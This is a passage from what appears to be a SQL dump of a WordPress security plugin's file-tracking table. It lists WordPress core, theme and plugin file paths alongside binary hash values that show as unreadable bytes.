9�@u�j�m�[��F�\"!�','',0,'?'),('a��b2C\r��u���','wp-content/themes/wp-simple/assets/images/bullets2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dҁ$�h�d���f�','v�n#��7#{�$���h�y��x;�V��K','',0,'?'),('{pe�j.�ق�|���S','wp-content/themes/wp-simple/inc/wp_bootstrap_navwalker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%)��B3��fM҆��','���߲�}�8g��G5e�\Z���ojF��','',0,'?'),('�,�4#��(�#','wp-signup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�*�\ra�*5�z�?�','��XjR�|%��Vs��j	��Q�XZ\r���','',0,'?'),('�d����|�RqW�a��','wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-typography-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lo�b�zzL�s�u+�','G`���H;}B��,�B=%�Tl�ab�}����','',0,'?'),('���-��ӯ�ȯn','wp-content/themes/city-store/inc/customizer/city-store-default-values.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"O�+Xh�b07���\\',':k��O\ZěQÝ��xP�9b�ȾKE:��','',0,'?'),('�A�z!L�#���E��','wp-content/themes/event/assets/font-awesome/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�Y����r�d','���~	+6�����bFf��9hPρ���,��','',0,'?'),('��j����.��','wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-code-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X$-v�L�h�UH','��M5E��_�Ozm5*�28�M��- %:���','',0,'?'),('ǖ��d�!s<X��Я','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�1{,˾�ʂ��','<�G���$�U+�k�L>\0h�ahB��S�-�','',0,'?'),('꽻OI���P�:�','wp-content/themes/simpleshift/inc/kirki/includes/output/property/class-kirki-output-property.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�Z�k��\0	���l��','U���jA	��\n�a�cD��_�Q\"-��.�	�','',0,'?'),('쩯��b�/�y;�f','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nh��e�S�,����!','��,GK��f���o�a��t}߆#Z��s�v�\'�','',0,'?'),('�@�G��mz짃�R�','wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-multicolor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�u���m�F�p���','��d���}��;�9T���$��\'tEj�(]','',0,'?'),('��L�\r���Q7y','wp-content/themes/wp-simple/inc/kirki/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jמ�^��~p\\t��','�|XC��U�,.���\n����]+M (K�u�c�','',0,'?'),('�*沫�Q�N','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oV�7PR~׬���ai','b�\Z�����s#:�*�\\���\'�i@���qa','',0,'?'),('�Ĉ��ψ�x�>�H','wp-content/plugins/wp-cerber/assets/flags/sd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1y����s�)�x�','�	�ZL���2���H��j�o�i�����','',0,'?'),('��y7��MA�@���','wp-includes/widgets/class-wp-widget-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9aP��,\n0��cHt��','�t�e�������wn2�v�\0o����e��2','',0,'?'),('�_)0d|�6_�;n','wp-includes/js/dist/rich-text.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y$�Bx!�u��񥰂�w','��(��/�,gw�&tS��O}���E|�ʂ�','',0,'?'),('m��xA�bV��','wp-content/themes/exoplanet/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"����������uV','0��`U^y���i���\Z@�0�H��A�','',0,'?'),(' (�ZKy��Ҩ窀)','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-radio-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bd���Ln;1v�����','L��9!�\\w�9�DW{���Mֆ�31Lzq1','',0,'?'),(' ;_��vX�U^\02g','wp-content/themes/exoplanet/images/no-sidebar-condensed.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H��.ŐCoN�~7��','yi�_w[6	t\r�Z�/��ڑO7�!�;L�7','',0,'?'),('\'2�E-�\r/_��y#','wp-content/themes/authorize/assets/stylesheets/font-awesome/scss/_list.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�9(\'_�B-”�','l���%�����xPXX#�5�M/�*l���','',0,'?'),(',d>HU��Е�<�D�!','wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-editor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?,5}�C!��K���','=,do �`F�Tl���a�Ԋ	�,�B��','',0,'?'),('=���S�Q**6��','wp-content/themes/education-hub/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ˆ���\r��U��; ','�\\���0V�Q��E��Ԝ�`���\01A�','',0,'?'),('>}�/K����q�%','wp-content/plugins/wordfence/css/wf-ionicons.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Al��s���j�⯃','ג��4�ˮ�v�����M�`�V��Z�','',0,'?'),('L��U��Byv��\0?','wp-content/themes/authorize/assets/stylesheets/font-awesome/less/font-awesome.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C|/�5��','\Z�qD�,R�Y5�V\'�C\'�B\r\n{�@�74�%','',0,'?'),('V)���K(\\�Ω;�','wp-content/themes/quicksand/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;��.\'�)�UyO�','�r��d��E�kܘ�8\Z���\ZE�bRU5ړ�{Y','',0,'?'),('[Xy����Y$�6JB�','wp-content/themes/wp-simple/assets/images/preview/girl.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X��|p�Y���$�','��_�[^g�@m�m!g�ӌ�y����dtK�7','',0,'?'),('h��+a.د�y��5��','wp-content/themes/skt-pathway/js/jquery.nivo.slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5gT��.E�{��}2d','��\"��l}hBW%��]�\0�EN�ep���eB�T','',0,'?'),('lm���\n�n���O�R','wp-content/themes/hitmag/inc/customizer/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}Y�sy�|�� �O�','�<�Q��Z�RY*Z�{UPBO�Rȯ����','',0,'?'),('��<��i����Q\0','wp-includes/js/dist/reusable-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�ގ�g��Ts؉f�','zt\r��j�Z\Z��H�ͼċ�!f����;��','',0,'?'),('�`&%eF�g����d','wp-content/plugins/wordfence/models/block/wfBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�1�g-M��@��','�Eϑ7���^\\0��uy|�]�J���\0�4��z�,','',0,'?'),('�:8�Ia��øl�m','wp-admin/includes/class-ftp-pure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T&�}�\\3��J�� \0','�\nS�{U��Cdz$����y���a|8�[','',0,'?'),('��2k��dS/tt�Ӈ','wp-content/themes/university-hub/css/customize-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��tZ*�K������.Jq','��v�{�o��S\Z�}��\"CpZ<ʣ��','',0,'?'),('�[���������R','wp-content/themes/twentynineteen/template-parts/post/author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\J��w���','2� ��ă���`�|��K 6<#:Gׯ��s','',0,'?'),('����KqM���{���','wp-admin/css/dashboard.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3T8�orO�0�t=+Z%','������D�E����bF��Xx騞���','',0,'?'),('��sݜ�Þ3�����','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#��7Ih�!���_�','�y�۹�����������!�H���HGH','',0,'?'),('�{xZ�c�\"�hb�?�','wp-includes/js/dist/dom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k��\"���MM�','D�I�&�\"�H��-���Q࣋�Fzֱ�ev�','',0,'?'),('�TB��O>�v2��}Ea','wp-includes/SimplePie/Locator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�3�y�%14���','<���ms�4�3p-I�/�8\'J�� }.�','',0,'?'),('�w\n�a�b0�%ʘ5�','wp-content/themes/wp-simple/inc/kirki/kirki/includes/sections/class-kirki-sections-hover-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ۄ6+ޓ��㾳\"','s��BhI��I�ݞ�\Z�N�����.{\rl��','',0,'?'),('ʻ�6�	1�h}','wp-content/themes/metro-magazine/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'+�\Z>q)��E-�T�','�����\nERY�R�F������q��l\r���\'','',0,'?'),('�`s3߬��,���','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/css/less_test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#\n���C�`fCP�','�)ee�<[��\"ۻb1��z��]�u׾�\\','',0,'?'),('�)���E�p������','wp-content/themes/weblog/assets/library/respond/respond.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�v|�����ב\'�','�i�CPE#�l�f��H��H�0�sքXk','',0,'?'),('��W�MF`3��$��','wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y^�������','Y	Q�FX��2�2�FW���)���fKSf�','',0,'?'),('�-ФQ�1Ц\r �','wp-content/themes/twentynineteen/sass/variables-site/_variables-site.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G\0��\\t4����E�','�,%d:?�-�ǯM�!k���gF6�ݱ���R�lj','',0,'?'),('��\\Xq@�C=˭�','wp-content/themes/skt-pathway/js/custom-customize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�O,w\"�f��P���[',']���_��Dy�����%��,�J]��','',0,'?'),('��*�7\r��?�','wp-includes/class-requests.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X@�?i� Xc����','���$��\r7�U���M����]���g6‡�>C','',0,'?'),('\0=��]hT҄>�','wp-content/themes/catch-flames/inc/panel/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�R�d�m��|1�$','�\0G�\0�bb�d%Y;\nhj!y���K	�:1�','',0,'?'),('L��e`d�˻��W','wp-content/plugins/wp-cerber/assets/flags/je.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�\n���F��>','wp-content/themes/university-hub/third-party/ticker/jquery.easy-ticker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R80(y\\��H2R��8FY','td�Ej[�>t��iA�ų�\'Z#Z��F�s�','',0,'?'),('\n{�C�����pg��','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-color-alpha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J���>T�If�jl�`','RPB�6W\Z\n���t�\"l�1��]�L�\ZZ9i�o','',0,'?'),('�l1�r$~�A�)','wp-content/plugins/wp-cerber/assets/flags/as.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�/����Z�3�','��UŰ�\r�^�W�}�Ux\"�C�@�Scu�l','',0,'?'),('�of?�3�P�1�\"�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g\"̤/O���Y��\'','�8�e�T�et\r j�P�/��J���<^�rӥz','',0,'?'),('$�Ӯ�hAci�<q','wp-content/themes/hitmag/inc/kirki/assets/css/select2.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!G�r�v[�Z�l )�','s��@�؜�#�h�rER0}��	A�1#Z��K�','',0,'?'),('<�j��_O�fO�a�|','wp-content/themes/graphene/js/jquery-ui/jquery.ui.custom.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|c�W�~��Pv�̽�','����2SN�7�gk������0��0P�k','',0,'?'),('@��;��k��^�ٗ','wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-color-palette-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z F����1FE�[/','�zQ0��E��5C\rl6�tߋ3ͺ\n�(Q�','',0,'?'),('F��e���}�(��','wp-includes/js/jquery/ui/dialog.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']2�z�L!E��,�C\Z','���|\r�Ce>�/k˪�\"E�0�݀V�L�','',0,'?'),('HYOI��<3���zX','wp-content/themes/singularity/archive-discussion-topics.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','io��,-���P@��','�QgZ{L�Ds���G҈����r����Ӛ�','',0,'?'),('N�\0f��~;I���','wp-content/plugins/wp-cerber/assets/flags/bm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��g��¶Mn�z�','��<������@ H�*��eթ�G�)�-CIԲ^','',0,'?'),('W�׾�5^��l_�_#�','wp-content/themes/twentynineteen/sass/typography/_typography.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>�7�2��n��t','��nek�o@�l�_���ky~�YWŢA���','',0,'?'),('i1��E~N�I�A͔��','wp-includes/Requests/Cookie/Jar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0_��&p��\"4�\\�','c��!�#B�i*+\"�\r�n���Iƈ�XÉ��w�','',0,'?'),('r�Ǹ2�=���=�','wp-content/themes/weblog/assets/library/Font-Awesome/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SC�\Z(ze� �v��a�','���z���B�h@\ZR�`+�)A� ��>��','',0,'?'),('s♼{DR�[�k�1�I','wp-content/plugins/wordfence/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zF��ހW�\rl�~6','V�{��Q9�V	����J	X�q���ڀc�','',0,'?'),('����X/��\0��	','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','On�4�r���\'f=','�b�����*�9Y�[]�\rᕂ\'�yԩ�e��','',0,'?'),('�N3M�\n��S��0j','wp-includes/js/dist/block-library.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`\\{�O�\Z�sl=��','��Pu6��Qi��D�9ï��_�iZ�G��Ad��','',0,'?'),('��+����7���','wp-content/themes/simpleshift/assets/images/glyphicons-halflings-white.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n���8\\.�=�dp�','m-��Q��H���Bw��\r~Q!}\n�L{��6�','',0,'?'),('�`��YCDw�=^��`','wp-content/themes/the-best/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0������uA��','>����\\��>+�.����ʪ��X�2�C','',0,'?'),('��h��%t���6�&','wp-content/themes/graduate/inc/customizer/upgrade-to-pro/customize-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x^d��5IMI�I���.','Q�:-ϐЍ��;��_:� �Т�����=�/M','',0,'?'),('�K�\0iݘ�O9�=i�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/markdown/test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4���͞�w�|r�@CkP','�8b��PN_a���vaʪ2���H?�\n�ƭ','',0,'?'),('��R�����*��H�:','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/hint/xml-hint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�Յ�Bb�}�yWi','C-q�K�8�	/Sٷ��sN^�?��8ŸI','',0,'?'),('��.�d�\0Y�*%�','wp-content/themes/hitmag/inc/kirki/assets/scss/controls/select.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d)b9��j��Y�oΚ','�}5�~��EPUW�m��nq�:;D�B��:K��E','',0,'?'),('�t3\n�&�s�d)OW','wp-content/themes/advance/inc/kirki/includes/output/class-kirki-output.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�\0~�4���8P','��@ow����YNtqW~��e�߇�X^aiH','',0,'?'),('��k���Kӏ\Zm�','wp-content/themes/newsmag/inc/assets/css/custom-editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V4�8|ƎX�0&�','0�v��%��ু�yS?-O����/�/�ry','',0,'?'),('��Kѐ.�d&R�x�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/repeater.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�P�a��#,?�','As�r8;���sMk�0=]�q!�a�;�:��\'','',0,'?'),('��璪�;./7','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/zenburn.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s�VyD��\0��.�','(?w7���`~yqĬ�v)zz�T�ғ�Y��Wt','',0,'?'),('��8)LH���rTI','wp-content/themes/authorize/assets/stylesheets/font-awesome/less/stacked.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�+-&9��ʡ�QKKN�','Ͻ�,�¿4���IF�\0e��Y�o���5��Ý9','',0,'?'),('�x(�ťܺ�.���Շ','wp-includes/class-wp-session-tokens.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9]�K�UJW�*��h�=','���4�\ZQuA^ء��j򬪎$M��0�\0','',0,'?'),('Ԓ��A����r��^','wp-includes/js/wp-custom-header.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+,�!�ڊLӺ~ν7�','��E�zk;3K�*X$���i���q��n��','',0,'?'),('���W𭄤�{5s','wp-content/themes/advance/css/unminified/normalize.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i������{�y̕��H','K�mWL�����g���/������7�x9;:��','',0,'?'),('�J΀�38|���_\r�','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-group-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�εSs�7�hE���!','��r�s�,�1=e�S{��i� �i�0~��n','',0,'?'),('�^0p����k����M','wp-includes/css/dist/nux/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ip����8\0p���','���������3Bk~�x*N���K}�mǧ߸n�','',0,'?'),('�S	����g	N�d','wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6_DB��NI�9���Ŷ�','���~DIb�xb{�IdO�.C�����:z/�D5�','',0,'?'),('���h]��C���A*','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'I�˞aFtz\\�Ǯ','���Ҭ�\ZADs���5����?���D�A/<�:','',0,'?'),('�0ܚ�Z�I�丱N','wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�U巃�� qD�F��H','���Ԧ�!���ӢtL�k.�\"1��Cm�Kg�','',0,'?'),('�3ƹܕj�bi�Υ�','wp-includes/customize/class-wp-customize-nav-menu-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@V{R#8�7n�n\n�','��a�H����Muyw?�h:�B��<=��,##�','',0,'?'),('�	wE��r��} �','wp-content/plugins/wp-cerber/assets/flags/gq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׾�\r�>.ⶱ���G','�d����^f�r��=�mM���Y��,���','',0,'?'),('���\"���m\Z�k','wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-select-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��~&�����\n��G','�Z�\"Et�o�TK@NB5�!��Ϣp�d','',0,'?'),('�[�t�uX����gSZ','wp-content/themes/brickyard/images/sidebar-li.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gag�8�ʧ^뗊�q�','#�_�V��#��c�^�Xv4ɵ���ݤ7���}','',0,'?'),('��1&��;���','wp-content/themes/exoplanet/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aӉfF+�ʟxPv�p�','��v{>���*�Cg��׿S�y�~���_�ʖ','',0,'?'),(' ��D���>��y','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/radio-buttonset.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p7�3t#�tF(�O|C!','��pǻ�_o�y���`(.�g��\\�B���,','',0,'?'),('.%��������W�4','wp-content/themes/newsmag/assets/vendors/machothemes/components/adsenseloader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dޟ���+ڧ\0~��','�πp[%���A�E`jYnS�><�PT���e�%','',0,'?'),(';���l�n�A%�5�','wp-content/themes/skt-pathway/images/sktskill.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��JY��z�_�6vJݜ','��OO+#��L�멒�D~��G�Ŷ�&ɗ','',0,'?'),('@}i\'�r���.����','wp-content/themes/catch-responsive/images/body-bg.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t6�c�Q<\"�ٛ��ܻ','��l���F����Y��q�R��\n�L�Z���','',0,'?'),('C��0@!���rer\r�','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y�(F�T<Q~�','\\�QA�:KJ��,p�Ǿf���ʗ�9gH�9@]','',0,'?'),('T w�:g^�v\\����','wp-content/themes/advance/inc/upsell.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F�F�(.�^�\Z7','��dXǾI��h�4�G�����f�:$��\n','',0,'?'),('Y1�7��g2�/�@��','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-palette.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i঺��ßOr�Q��','6a���Jޘ�ݾ�mm�?�/�e�{�ӆ\0�\r','',0,'?'),('b9�k���LK�tS\n�v','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/lint/html-lint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n=tF�1���C&\Z�','o�-�Ei�� *�pF�`�I����g��q��)�.','',0,'?'),('b���E�����4t=','wp-content/plugins/wordfence/views/dashboard/options-group-alert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̻o��wG>p','�I�`I^{�Pנh�Q��e:sG^��8�sĚ','',0,'?'),('��q#YU�_����*','wp-content/themes/Yegor/index.php',0,'��/in�4����vL ','��/in�4����vL ','���E�h��0\r� ?s^�1ڡ��<$�','',0,'?'),('�]��`c\Z�~˰:','wp-content/themes/enigma/images/shadow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�՚r��	�.�n','xgf�m=Z��=[Su�/!�s��\"K��a�','',0,'?'),('���\r|-a��,��ଳ','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/multicolor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/��C�h���/.��-�','T�\'�nd���5���:f��65Tj�_|�$��S','',0,'?'),('��,‚=9���h�6K�','wp-includes/js/jquery/ui/draggable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:2��g9�tL�D�','��Cu�o.t�?�xd�x�CK�6�Ηp_�','',0,'?'),('���߸�/@���>�','wp-content/themes/hitmag/inc/kirki/includes/class-kirki-field.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�Ău#��Y���%','h�(��F\\��.�v���\\�p������}�','',0,'?'),('��un�Rـ���:9��','wp-content/plugins/all-in-one-wp-security-and-firewall/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\\"*��!83�+','��Ӻ:�B��ֶV�Ɍ)�Nɳ��p�','',0,'?'),('�\0Ƭ����#���(�','wp-content/themes/twentytwenty/package-lock.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���=AG� ��\0�076','}Jz��0�$�1��Ǜb�����#,=���','',0,'?'),('�[��[�~/�dM5_V','wp-content/themes/graduate/assets/js/custom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+�[�U�&�&NS��l','�[�%�.gF)0BN=7�-���Ig��\0�kbo','',0,'?'),('��]�Ɖ	��e','wp-content/themes/twentytwentyone/assets/css/style-dark-mode-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g�5�p�McHe{','�3ڢ�;!�ٺ��O���h��=rR�gV��/','',0,'?'),('ʔf��O�\'�]t�ߪ','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-radio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|���Z��P��tyf','�{p��۹�\0�YںC8h3$�~z�d����','',0,'?'),('��s���N�m�ײ��','wp-content/themes/enigma/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ti[@�y�P1�KI�C','�E�[z�?Z\'\Z�r�G-LQ�\r�����{','',0,'?'),('�P��E7�yv��*�7','wp-content/themes/newsmag/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[��?�ꦨqq�R','L`��X(��g�&��.�c;S��]Z2aV:�L','',0,'?'),('�0���զ����','wp-content/plugins/wp-cerber/assets/flags/gw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*qWM����f2�c','d�n�;L�m%��\"NA�oZE!���J�_͆�','',0,'?'),('�ٜ_�wF�-2���','wp-content/themes/enigma/core/admin/bootstrap/css/bootstrap-theme.min.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���˕u��&���l','/�DnL���	¼���΍�t�?2ދx=����','',0,'?'),('��>�/ᡇ_����','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l([qא��D#��','\\sٶ�hb�2.;�m`F��r^&�H-w	�yV�~','',0,'?'),('�&UX\r�L4{����','wp-includes/js/utils.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��0�`ߣ���MVi`','�js�@Vna�v�t\'ȀD��,݆���T;','',0,'?'),('��ԞX�[�`?��^','wp-includes/block-patterns/large-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`���3��\0�]j6?>','��b�`&h�2��)V�KF}Ո�m�?*f�搭','',0,'?'),('\Zx�I,[�ϐ����','wp-content/themes/graphene/includes/theme-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f��Z�C��\0��i6l','�ךtl���]�����B���Ǭ�s�Ub�`q','',0,'?'),('\Z֧��\\\Z�h�i','wp-includes/js/dist/blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' */ĭ�b��@m�0','����˴kS򢱼h�4���!�3:�Tæ�~DM','',0,'?'),('\ZO�3F5K�;�@ �','wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�q\\�}����[�','�[�T�n�Ejd�(�$�:!�h�Ν\0�s�><','',0,'?'),('\Z,Q���%���z�[','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/scroll/annotatescrollbar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v����ً�#H���','���;������%UM�Ǡ�\r��*rеa:0','',0,'?'),('\Z&�cR�< FiC�','wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ƥܐ�W^�[�g�','�dL�����cK~=0jE�]�����~\"�','',0,'?'),('\ZBƐ��\Z���1^x	','wp-content/themes/edge/pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�p�h��=�\\�Yd-','Q�J%cu�X��:�6�=֙����6k8�','',0,'?'),('\ZN\Z�`i